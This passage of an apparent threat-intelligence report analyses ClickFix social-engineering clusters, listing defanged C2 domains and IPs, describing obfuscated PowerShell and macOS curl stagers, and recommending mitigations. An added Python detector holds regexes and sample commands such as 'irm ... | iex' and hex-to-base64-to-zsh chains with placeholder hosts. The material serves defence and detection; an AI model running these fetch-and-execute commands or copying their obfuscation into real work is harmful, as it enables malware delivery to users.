        <p>While staging domains vary, the final payloads across this cluster converge on the same NetSupport RAT C2 infrastructure (<strong>Table 5</strong>).</p>
        <table>
          <thead>
            <tr>
              <th>ClickFix Domain</th>
              <th>IP Address</th>
              <th>Dropper</th>
              <th>NetSupport RAT C2</th>
            </tr>
          </thead>
          <tbody>
            <tr>
              <td>sign-in-op-token[.]com</td>
              <td>91[.]202[.]233[.]206</td>
              <td>bkng-updt[.]com<br/>77[.]91[.]65[.]144</td>
              <td>hotelupdatesys[.]com<br/>152[.]89[.]244[.]70</td>
            </tr>
            <tr>
              <td>thestayreserve[.]com</td>
              <td>91[.]202[.]233[.]206</td>
              <td>checkpulses[.]com<br/>77[.]91[.]65[.]31</td>
              <td>chrm-srv[.]com<br/>ms-scedg[.]com<br/>152[.]89[.]244[.]70</td>
            </tr>
          </tbody>
        </table>
        <p><em><strong>Table 5:</strong></em> <em>IoCs observed in the Booking.com infection chain (Source: Recorded Future)</em></p>
        <p>Following installation, the malware from <em>thestayreserve[.]com</em> initiates communication (<strong>Figure 10</strong>) with <em>chrm-srv[.]com</em> and <em>ms-scedg[.]com</em>, both of which resolve to <em>152[.]89[.]244[.]70</em>. The domain <em>hotelupdatesys[.]com</em> resolves to the same IP address as the NetSupport RAT C2 for <em>sign-in-op-token[.]com</em>.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_17e4c38a5fc2867dd56076e5a5fdbcf434b8ad6fe.png?width=750&amp;format=png&amp;optimize=medium" width="1466" height="772" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 10:</strong></em> <em>POST Request from</em> sign-in-op-token[.]com <em>showing NetSupport interaction (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h2>Cluster 3: Birdeye</h2>
        <p>Cluster 3 was observed operating from May 2024 until the time of writing. Previously reported on by Insikt Group, this cluster uses infrastructure centered on domains incorporating the keyword "bird" to deliver its ClickFix lure pages, trackable in Recorded Future’s HTML Content Analysis. These lures spoof Birdeye, an AI marketing company, to manipulate victims into executing malicious commands.</p>
        <h3>Cluster 3 Profile</h3>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1df156ae60dfd2e6c4b1d3a2ee033c7eae94c5c25.png?width=750&amp;format=png&amp;optimize=medium" width="1480" height="1042" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 11</strong>: Overview of ClickFix Cluster 3 — Birdeye (Source: Recorded Future)</em></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_152cb9c63c01bb7c8a4abb2cfff959cd1e5dfe5a1.png?width=750&amp;format=png&amp;optimize=medium" width="1476" height="240" />
            </div>
          </div>
          <div>
            <div><em><strong>Table 6:</strong></em> <em>PowerShell command observed across Cluster 3</em></div>
          </div>
        </div>
        <h3>Cluster 3 Infection Chain</h3>
        <p>The infection chain begins when a victim visits a compromised site and is presented with a Cloudflare-style CAPTCHA challenge. Upon interacting with the page, the victim is prompted to run a command in the Windows Run dialog box. Insikt Group identified this cluster by pivoting on unique technical identifiers within the HTML artifacts, including a consistent and unique page title and a static image used across the infrastructure.</p>
        <p>The command the victim is manipulated into running causes the victim’s device to reach out to <em>alababababa[.]cloud</em> to download a payload from <em>hxxps[://]alababababa[.]cloud/cVGvQio6[.]txt</em>. To further reduce suspicion, once the malicious command is executed, the victim is redirected to the legitimate <em>birdeye.com</em> website (see <strong>Figure 12</strong>).</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_19de0a1b7b9ff9d5e6f1ef0dc991bd6180c38a92f.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1200" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 12:</strong></em> <em>The redirect to the legitimate Birdeye website (Source: Recorded Future)</em></div>
          </div>
        </div>
        <p>Analysis of the JavaScript within the DOM for this cluster, provided in <strong>Appendix F</strong>, revealed insights into the threat actor's methods. A notable portion of the script uses seven obfuscated lines that are concatenated into a single string to be written to the victim's clipboard. The developer left comments within the code that detail the deobfuscated purpose of each line. For example, one comment explicitly identifies the portion of the command calling PowerShell with specific flags (<strong>Figure 13</strong>).</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_174bbc4877775d467b17148e38520931ee756c7d2.png?width=750&amp;format=png&amp;optimize=medium" width="1476" height="136" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 13:</strong></em> <em>Portion of JavaScript containing threat actor comments (Source: Recorded Future)</em></div>
          </div>
        </div>
        <p>Furthermore, a comment written in Cyrillic at the beginning of the script translates to, "This should help bypass Cloudflare static analysis". This internal documentation suggests the threat actor is purposefully detailing their actions to refine bypass techniques against security scanners.</p>
        <p>Historically, <em>alababababa[.]cloud</em> has been <a href="https://dti.domaintools.com/securitysnacks/hunting-for-malware-networks">associated</a> with the delivery of multiple malware strains, including Lumma Stealer and RedLine Stealer. The large volume of domains identified in this cluster, exceeding 40 unique entries, highlights the scale of the "run and repeat" model used to sustain this activity.</p>
        <h2>Cluster 4: Dual-Platform Selection</h2>
        <p>Cluster 4 was observed operating from March 2025 to the time of writing. This cluster is unique for its use of operating system detection to deliver tailored ClickFix lures for both Windows and macOS users. Unlike standard ClickFix behavior that typically pushes commands to the clipboard automatically, this variant provides detailed manual instructions, requiring the victim to open native system tools and manually copy and paste the provided staging payload. One of the ClickFix pages used to analyze this behavior was <em>macosapp-apple[.]com</em>, hosted at IP address <em>45[.]144[.]233[.]192</em>.</p>
        <h3>Cluster 4 Profile</h3>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_133d418b6a1811ed5c4ec6a91a5ad4948c6fd5d05.png?width=750&amp;format=png&amp;optimize=medium" width="1476" height="1224" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 14</strong>: Overview of ClickFix Cluster 4 — Dual-Platform Selection (Source: Recorded Future)</em></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1355d223dd69035a45bcc034a66983b44f5504547.png?width=750&amp;format=png&amp;optimize=medium" width="1476" height="532" />
            </div>
          </div>
          <div>
            <div><em><strong>Table 7:</strong></em> <em>Encoded commands observed across Cluster 4</em></div>
          </div>
        </div>
        <h3>Cluster 4 Infection Chain</h3>
        <p>The infection chain begins when a victim lands on a ClickFix page that instructs them to verify they are human (<strong>Figure 15</strong>).</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1dd0aad9b15938b48669c9aa30af7cce46081babb.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1200" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 15</strong>: ClickFix page identified in Cluster 4 (Source: Recorded Future Web Scans)</em></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1da0a662a297a2130b487e627394bbe8e6a250860.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1200" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 23</strong>: Landing page for</em> mac-os-helper[.]com <em>(Source: Recorded Future)</em></div>
          </div>
        </div>
        <p>Once the Terminal is open, the victim is prompted to execute a multi-stage command that purportedly "finds and removes temporary system files".</p>
        <p>In reality, these commands (see <strong>Table 9</strong>) use different encoding layers to hide their true intent; the first example decodes a hexadecimal string to reveal a Base64-encoded client URL (curl) instruction, while the second directly decodes a Base64 string to run an executable command. Both methods ultimately bypass simple pattern matching by obfuscating the malicious payload until execution.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1a8a940b22efe1a0138ad299b1a137a4f5fec5441.png?width=750&amp;format=png&amp;optimize=medium" width="1486" height="396" />
            </div>
          </div>
          <div>
            <div><em><strong>Table 9</strong>: Encoded and obfuscated ClickFix commands for macOS (Source: Recorded Future)</em></div>
          </div>
        </div>
        <p>As shown in <strong>Table 10</strong>, the revealed curl instruction uses a compound set of short options, <code>-kfsSL</code> in this cluster, to facilitate silent delivery. These flags ensure that Transport Layer Security (TLS) certificate checks are bypassed, server-side errors are suppressed, and the process remains hidden from the user's view while following redirections to reach the final payload domain.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1455f0d1912baf993ed061038c5191b4538089d06.png?width=750&amp;format=png&amp;optimize=medium" width="1486" height="258" />
            </div>
          </div>
          <div>
            <div><em><strong>Table 10:</strong></em> <em>Decoded and deobfuscated ClickFix commands for macOS (Source: Recorded Future)</em></div>
          </div>
        </div>
        <p>Based on historic evidence (<a href="https://threatfox.abuse.ch/ioc/1748676/">1</a>, <a href="https://threatfox.abuse.ch/ioc/1743300/">2</a>) and forensic patterns, Insikt Group assesses with high confidence that the information stealer MacSync was the primary payload used to infect victims in this cluster. The malicious commands on these pages caused the infected systems to reach out to a specific set of staging and C2 infrastructure, detailed in <strong>Table 11</strong>. Notably, while the domains varied, they were frequently observed behind Cloudflare to complicate network-level blocking.</p>
        <table>
          <thead>
            <tr>
              <th>Indicator</th>
              <th>IP Address</th>
              <th>ASN</th>
              <th>First Seen</th>
              <th>Last Seen</th>
            </tr>
          </thead>
          <tbody>
            <tr>
              <td>octopox[.]com</td>
              <td>Cloudflare</td>
              <td>Cloudflare</td>
              <td>2026-02-06</td>
              <td>2026-03-05</td>
            </tr>
            <tr>
              <td>joeyapple[.]com</td>
              <td>Cloudflare</td>
              <td>Cloudflare</td>
              <td>2026-02-04</td>
              <td>2026-03-05</td>
            </tr>
          </tbody>
        </table>
        <p><em><strong>Table 11</strong>: C2 servers identified for the macOS cleaner campaign (Source: Recorded Future)</em></p>
        <h2>Copy Command Analysis</h2>
        <p>Insikt Group analyzed commands across the five clusters identified in this research. While the visual lures and impersonated brands vary between groups like Cluster 1 (Intuit QuickBooks) and Cluster 5 (macOS Storage Cleaning), the underlying execution logic remains consistent. This "run and repeat" methodology relies on a narrow set of trusted LOLBins and lightweight obfuscation to stage remote code with minimal forensic artifacts.</p>
        <p>The technical implementation of ClickFix follows a standardized four-stage pattern across all target operating systems, as summarized in <strong>Table 12</strong>.</p>
        <div>
          <div>
            <div><strong>Stage</strong></div>
            <div><strong>Action</strong></div>
            <div><strong>Technical Intent</strong></div>
          </div>
          <div>
            <div><strong>Obfuscated Input</strong></div>
            <div>Input of highly encoded or fragmented strings</div>
            <div>Bypass static analysis and signature-based detection</div>
          </div>
          <div>
            <div><strong>Native Execution</strong></div>
            <div>Leveraging trusted system shells (<code>zsh</code>, <code>bash</code>, or <code>powershell.exe</code>)</div>
            <div>Execute the initial stager using legitimate system binaries</div>
          </div>
          <div>
            <div><strong>Remote Ingress</strong></div>
            <div>Initiation of external requests to threat actor-controlled IPs or domains</div>
            <div>Download secondary scripts or payloads from the staging infrastructure</div>
          </div>
          <div>
            <div><strong>In-Memory Execution</strong></div>
            <div>Piping downloaded content directly into an interpreter</div>
            <div>Ensure no malicious files are initially saved to disk to evade endpoint security</div>
          </div>
        </div>
        <p><em><strong>Table 12</strong>: Standardized four-stage ClickFix execution pattern (Source: Recorded Future)</em></p>
        <p>Insikt Group identified two primary command styles used in macOS-centric campaigns, such as Cluster 4 and Cluster 5, which are detailed in <strong>Table 13</strong>.</p>
        <div>
          <div>
            <div><strong>Technique</strong></div>
            <div><strong>Observed Pattern</strong></div>
            <div><strong>Defender Insight</strong></div>
          </div>
          <div>
            <div><strong>Multi-Stage Encoding</strong></div>
            <div>Hex -&gt; Base64 -&gt; ZSH</div>
            <div>The use of <code>xxd -r -p</code> in a user-initiated command is a significant indicator of malicious intent, as it is rarely used in legitimate troubleshooting.</div>
          </div>
          <div>
            <div><strong>Persistence and Backgrounding</strong></div>
            <div>Use of <code>nohup</code> and the <code>&amp;</code> operator</div>
            <div>This ensures the malicious process continues to run in the background even after the user closes the terminal, providing persistence during staging.</div>
          </div>
        </div>
        <p><em><strong>Table 13</strong>: Observed tactics, techniques, and procedures (TTPs) for macOS and Linux (</em><code>zsh</code> <em>and</em> <code>bash</code><em>) commands (Source: Recorded Future)</em></p>
        <p>Windows-based commands, particularly those observed in Cluster 1 and Cluster 2, exhibit a higher degree of sophistication through "Command Swizzling" and case randomization, as shown in <strong>Table 14</strong>.</p>
        <div>
          <div>
            <div><strong>Technique</strong></div>
            <div><strong>Observed Pattern</strong></div>
            <div><strong>Defender Insight</strong></div>
          </div>
          <div>
            <div><strong>Parameter Obfuscation</strong></div>
            <div>Randomized casing and shortened aliases (for example, <code>-wINDoW MiNI</code>, <code>-wi mi</code>, or <code>-w h</code>)</div>
            <div>Threat actors use these to evade security tools looking for literal strings like "Hidden" or "Minimized".</div>
          </div>
          <div>
            <div><strong>The "Golden" Pattern</strong></div>
            <div>Combining Invoke-RestMethod (<code>irm</code>) with Invoke-Expression (<code>iex</code>)</div>
            <div>This allows for the seamless retrieval and execution of remote code entirely in memory. This combination is a high-fidelity hunting indicator for ClickFix activity.</div>
          </div>
          <div>
            <div><strong>String Manipulation Deception</strong></div>
            <div>Using <code>.Substring()</code> or <code>.Replace()</code> to "build" commands</div>
            <div>Clusters like Cluster 1 avoid explicitly typing <code>iex</code> to bypass static signature detections.</div>
          </div>
        </div>
        <p><em><strong>Table 14</strong>: Observed TTPs for Windows (PowerShell) commands (Source: Recorded Future)</em></p>
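        <p>The defender insights in Tables 12 through 14 translate directly into hunt logic. The following Python is an added example and not Recorded Future's code: it encodes those patterns as regexes, scores a pasted command line against the four stages of Table 12, and runs over constructed sample commands that use placeholder hosts only; the rule names, weights and threshold are this example's own assumptions.</p>

```python
"""Heuristic triage of pasted ClickFix-style command lines.

Added example, not Recorded Future's code. The regexes encode the defender
insights of Tables 12-14; rule names, weights, the threshold and the sample
commands (placeholder hosts only) are this example's own assumptions.
"""
import re
from dataclasses import dataclass, field

# The four stages of Table 12, in the order the chain normally runs.
STAGES = ("obfuscated_input", "native_execution", "remote_ingress", "in_memory_execution")

# (rule name, Table 12 stage it evidences, weight, pattern). Weights are assumptions.
RULES = [
    # Table 14: randomised casing / prefix aliases of -WindowStyle Hidden|Minimized
    ("ps_window_hidden", "native_execution", 2,
     re.compile(r"(?i)(?<!\S)-w[indowstyle]*\s+(?:h\w*|mi\w*)\b")),
    # Table 14: the "golden" irm -> iex pattern, in either pipe or nested form
    ("ps_irm_iex", "in_memory_execution", 5,
     re.compile(r"(?i)\b(?:irm|invoke-restmethod)\b[^|]*\|\s*(?:iex|invoke-expression)\b"
                r"|\b(?:iex|invoke-expression)\s*\(\s*(?:irm|invoke-restmethod)\b")),
    # Table 14: .Substring()/.Replace() assembling the command so "iex" is never typed
    ("ps_string_build", "obfuscated_input", 3,
     re.compile(r"(?i)\.(?:substring|replace)\s*\(")),
    # Table 13: hex -> base64 -> shell; xxd -r -p is rare in legitimate troubleshooting
    ("sh_xxd_reverse", "obfuscated_input", 4,
     re.compile(r"\bxxd\s+(?:-r\s+-p|-p\s+-r|-rp|-pr)\b")),
    ("sh_base64_decode", "obfuscated_input", 2,
     re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")),
    # Table 13: nohup or a trailing & keeps the stager alive after the terminal closes
    ("sh_background", "native_execution", 2,
     re.compile(r"\bnohup\b|&\s*$")),
    # Table 12: reach-out to actor-controlled infrastructure
    ("remote_ingress", "remote_ingress", 2,
     re.compile(r"(?i)https?://|\b(?:curl|wget)\b")),
    # Table 12: downloaded content piped straight into an interpreter, nothing on disk
    ("pipe_to_interpreter", "in_memory_execution", 3,
     re.compile(r"(?i)\|\s*(?:nohup\s+)?(?:zsh|bash|sh|iex|invoke-expression)\b")),
]
SUSPECT_THRESHOLD = 6  # assumption: tune against a baseline of benign pastes


@dataclass
class Finding:
    command: str
    rules: list = field(default_factory=list)   # rule names that fired, in RULES order
    stages: list = field(default_factory=list)  # distinct Table 12 stages evidenced
    score: int = 0

    @property
    def suspect(self) -> bool:
        # irm|iex is high-fidelity on its own (Table 14); everything else accumulates.
        return "ps_irm_iex" in self.rules or self.score >= SUSPECT_THRESHOLD

    @property
    def missing_stages(self) -> list:
        # A stage that did not fire is often hidden inside the encoded blob
        # (e.g. the curl inside a hex/base64 payload), not absent from the chain.
        return [s for s in STAGES if s not in self.stages]


def analyze(command: str) -> Finding:
    """Score one command line against every rule."""
    f = Finding(command=command.strip())
    for name, stage, weight, pattern in RULES:
        if pattern.search(f.command):
            f.rules.append(name)
            if stage not in f.stages:
                f.stages.append(stage)
            f.score += weight
    return f


def triage(commands) -> list:
    """Return only the suspect findings, highest score first."""
    hits = [f for f in map(analyze, commands) if f.suspect]
    return sorted(hits, key=lambda f: f.score, reverse=True)


# Constructed fixtures in the shapes Tables 13 and 14 describe; hosts are placeholders.
SAMPLE_COMMANDS = [
    # Cluster 1/2 style: case-randomised window flag, irm piped into iex
    'powershell -wINDoW MiNI -c "irm https://example.invalid/v | iex"',
    # "Swizzled" variant: iex is built with .Substring() rather than typed
    "powershell -w h -c \"& ('_iex'.Substring(1)) (irm https://example.invalid/q)\"",
    # Cluster 4/5 style macOS chain: hex -> base64 -> zsh, backgrounded with nohup
    "echo 'PLACEHOLDER_HEX' | xxd -r -p | base64 -d | nohup zsh &",
    # Benign administration that must stay below the threshold
    'powershell -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    "base64 -d backup.tar.gz.b64 > backup.tar.gz",
]

if __name__ == "__main__":
    for f in triage(SAMPLE_COMMANDS):
        print(f"score={f.score:2d} stages={f.stages} missing={f.missing_stages}")
        print(f"  rules={f.rules}\n  {f.command}")
```

Note that the macOS fixture never trips the remote-ingress rule because the download sits inside the encoded blob, which is why the encoding rules carry weight of their own.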
        <h2>Mitigations</h2>
        <p>To mitigate the threats posed by ClickFix social engineering and related living-off-the-land (LotL) techniques, Insikt Group recommends a defense-in-depth approach that combines proactive intelligence monitoring with aggressive hardening of native system utilities.</p>
        <ul>
          <li><strong>Operationalize HTML Content Analysis:</strong> Recorded Future customers should use the HTML Content Analysis source to monitor for impersonations of their brand, which are leveraged to deliver ClickFix. Leverage the Recorded Future Intelligence Operations Platform to monitor for unique web artifacts, such as specific Document Object Model (DOM) hashes and page titles, to identify new ClickFix domains in real time.</li>
          <li><strong>Use Recorded Future Threat Intelligence:</strong> Recorded Future customers can proactively mitigate this threat by operationalizing Recorded Future Intelligence Operations Platform data, specifically by leveraging continuously updated Risk Lists and by blocklisting IP addresses and domains associated with ClickFix to block communication with malicious infrastructure.</li>
          <li><strong>Monitor Malicious Infrastructure Risk Lists:</strong> Continuously update security information and event management (SIEM) and endpoint detection and response (EDR) tools with Recorded Future Risk Lists to block traffic to identified staging and command-and-control (C2) domains.</li>
          <li><strong>Use Malware Intelligence</strong>: Leverage the Recorded Future Intelligence Operations Platform to hunt for indicators of compromise (IoCs) associated with payloads identified in this report, such as NetSupport RAT, Odyssey Stealer, and Lumma Stealer.</li>
          <li><strong>Leverage Network Intelligence:</strong> Use <a href="https://go.recordedfuture.com/hubfs/Network_Intelligence_Datasheet.pdf">Recorded Future Network Intelligence</a> to detect exfiltration events early (such as those linked to NetSupport RAT), which can help prevent intrusions before they escalate. This approach relies on comprehensive, proactive infrastructure discovery provided by Insikt Group and the analysis of vast amounts of network traffic.</li>
          <li><strong>Use Identity Module</strong>: Recorded Future customers should leverage the Identity Module to monitor for credentials and passwords being sold on the dark web that have been stolen by information stealers.</li>
          <li><strong>Disable Windows Run Dialog via Group Policy Objects (GPOs)</strong>: For corporate environments, disable the <code>Win+R</code> keyboard shortcut and the Run command in the Start menu via Group Policy Objects (GPOs). This significantly hinders the ClickFix execution chain, as victims are typically instructed to paste malicious commands directly into this dialog box.</li>
          <li><strong>Restrict Terminal and PowerShell Execution</strong>: Implement PowerShell Constrained Language Mode (CLM) and use AppLocker or Windows Defender Application Control (WDAC) to prevent the execution of unsigned scripts and the misuse of living-off-the-land binaries (LOLBins). On macOS, restrict Terminal and other shell interpreters (for example, <code>zsh</code> and <code>bash</code>) using application control policies enforced via mobile device management (MDM), and leverage System Integrity Protection (SIP) and endpoint security controls to limit unauthorized script execution and abuse of native command-line utilities.</li>
          <li><strong>User Awareness and Training</strong>: Conduct targeted social engineering simulations that specifically educate users on the dangers of "manual verification" prompts that require copying and pasting commands into system utilities.</li>
        </ul>
        <h2>Outlook</h2>
        <p>The identification of five parallel operational clusters targeting diverse sectors, including accounting, travel, real estate, and legal services, indicates that the ClickFix methodology has transitioned from a niche technique to a standardized template within the cybercriminal ecosystem. This standardized "run and repeat" model is facilitating broader adoption by both lower-tier "traffers" and sophisticated advanced persistent threat (APT) groups. Threat actors are able to maintain operational continuity even when individual domains are blocked due to the availability of disposable infrastructure and shared technical templates.</p>
        <p>Insikt Group assesses with high confidence that the ClickFix methodology will very likely remain a heavily used initial access vector throughout 2026. The continued success of ClickFix is driven by its ability to bypass advanced browser-based security controls by shifting the point of exploitation to user-assisted manual actions. As long as native system utilities such as PowerShell and Terminal remain accessible to end-users, ClickFix will continue to offer threat actors a high-return, low-complexity alternative to traditional exploit kits.</p>
        <p>Looking ahead, ClickFix lures will likely become increasingly technically adaptive. Future iterations are expected to incorporate more granular browser fingerprinting to conditionally serve payloads based on a victim's hardware, geographic location, or organizational profile. Furthermore, since threat actors are already purposefully documenting bypass techniques for static analysis engines within their code, Insikt Group anticipates a long-term trend toward more resilient and obfuscated staging environments. This convergence of sophisticated social engineering and LotL techniques necessitates a shift in defensive strategy, moving away from simple indicator blocking toward aggressive behavioral hardening of the system utilities that ClickFix relies upon.</p>
        <h2>Appendix A: Indicators of Compromise</h2>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_18ce7edd37f19ffb5fc8f2ecc71373f3289507995.png?width=750&amp;format=png&amp;optimize=medium" width="1258" height="1392" />
            </div>
          </div>
          <div>
            <div></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_16be742309696be96075872e73f72ec87ce30c67a.png?width=750&amp;format=png&amp;optimize=medium" width="1258" height="1484" />
            </div>
          </div>
          <div>
            <div></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1904a7c17ae9ec924e23ba147931e923adc8fff00.png?width=750&amp;format=png&amp;optimize=medium" width="1258" height="1484" />
            </div>
          </div>
          <div>
            <div></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1bc0ec972fec574cbdd3f4d73c41f7e02345540f5.png?width=750&amp;format=png&amp;optimize=medium" width="1258" height="1272" />
            </div>
          </div>
          <div>
            <div></div>
          </div>
        </div>
        <h2>Appendix B: Cluster 1 — Intuit QuickBooks Indicators</h2>
        <h2>Appendix C: bibi.php Script</h2>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_14f678dfcceb86fe66848ade7c543ab0017cbb1c3.png?width=750&amp;format=png&amp;optimize=medium" width="1258" height="1390" />
            </div>
          </div>
          <div>
            <div></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_191574e4830e7909e62a79e4d3ff1c612e928c1bc.png?width=750&amp;format=png&amp;optimize=medium" width="1258" height="1490" />
            </div>
          </div>
          <div>
            <div></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_123d049fb8874e716baa55e028a0bdc98a5aabbae.png?width=750&amp;format=png&amp;optimize=medium" width="1258" height="548" />
            </div>
          </div>
          <div>
            <div></div>
          </div>
        </div>
        <h2>Appendix D: Cluster 2 — Booking.com Indicators</h2>
        <h2>Appendix E: Cluster 3 — Birdeye Indicators</h2>
        <h2>Appendix F: Birdeye Cluster JavaScript</h2>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_12fdc05c3f194f5e29fe1c8db7ca9e25f0abf6f79.png?width=750&amp;format=png&amp;optimize=medium" width="1260" height="1360" />
            </div>
          </div>
          <div>
            <div></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_13dd203417b2a025c2bd1932c5f7ee8402ef84fa8.png?width=750&amp;format=png&amp;optimize=medium" width="1260" height="1484" />
            </div>
          </div>
          <div>
            <div></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1f84a894f6c81d0e7ebd89e08af321da549187eb1.png?width=750&amp;format=png&amp;optimize=medium" width="1260" height="1484" />
            </div>
          </div>
          <div>
            <div></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1196b63329b8f8e703bf1869ef5ea63b49bffb750.png?width=750&amp;format=png&amp;optimize=medium" width="1268" height="1246" />
            </div>
          </div>
          <div>
            <div></div>
          </div>
        </div>
        <h2>Appendix G: Cluster 4 — Dual-Platform Selection Indicators</h2>
        <div>
          <div>
            <div><strong>Indicator</strong></div>
            <div><strong>IP Address</strong></div>
            <div><strong>ASN</strong></div>
            <div><strong>First Seen</strong></div>
            <div><strong>Last Seen</strong></div>
          </div>
          <div>
            <div>valetfortesla[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-11-12</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>macxapp[.]org</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-06-18</div>
            <div>2025-06-18</div>
          </div>
          <div>
            <div>apposx[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-06-13</div>
            <div>2025-06-24</div>
          </div>
          <div>
            <div>cryptonews-info[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-06-18</div>
            <div>2025-12-20</div>
          </div>
          <div>
            <div>macosx-app[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-06-14</div>
            <div>2025-06-16</div>
          </div>
          <div>
            <div>cryptoinfnews[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-06-14</div>
            <div>2025-06-30</div>
          </div>
          <div>
            <div>macxapp[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-06-14</div>
            <div>2025-06-16</div>
          </div>
          <div>
            <div>cryptoinfo-allnews[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-06-13</div>
            <div>2025-06-30</div>
          </div>
          <div>
            <div>appxmacos[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-06-13</div>
            <div>2025-06-30</div>
          </div>
          <div>
            <div>appmacintosh[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-06-12</div>
            <div>2025-06-13</div>
          </div>
          <div>
            <div>macosxappstore[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-06-09</div>
            <div>2025-06-30</div>
          </div>
          <div>
            <div>macosx-apps[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-06-09</div>
            <div>2025-06-11</div>
          </div>
          <div>
            <div>cryptoinfo-news[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-06-08</div>
            <div>2025-06-29</div>
          </div>
          <div>
            <div>financementure[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-05-27</div>
            <div>2025-06-30</div>
          </div>
          <div>
            <div>appsmacosx[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-05-27</div>
            <div>2025-06-09</div>
          </div>
          <div>
            <div>appmacosx[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-05-27</div>
            <div>2025-06-14</div>
          </div>
          <div>
            <div>macosxapp[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-05-27</div>
            <div>2025-06-09</div>
          </div>
          <div>
            <div>macosapp-apple[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-05-25</div>
            <div>2025-05-26</div>
          </div>
          <div>
            <div>macapps-apple[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-05-23</div>
            <div>2025-05-24</div>
          </div>
          <div>
            <div>macapp-apple[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-05-13</div>
            <div>2025-05-23</div>
          </div>
        </div>
